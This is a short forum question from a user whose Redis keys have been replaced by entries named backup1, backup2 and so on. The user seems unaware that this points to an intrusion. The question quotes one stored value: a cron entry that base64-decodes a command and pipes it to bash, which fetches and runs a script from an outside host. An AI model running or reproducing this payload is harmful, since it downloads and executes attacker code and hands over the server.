# Redis key converted to backup

Tags: redis, key, backup

After a few minutes automatically my all keys are converted to backup1, backup2 ....

Values are converted to base64 strings like

```
*/2 * * * * root echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash
```

I did not set any TTL but its happening on my Linux env.

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Comment: i think question is related to your answer
https://stackoverflow.com/questions/50264694/my-redis-auto-generated-keys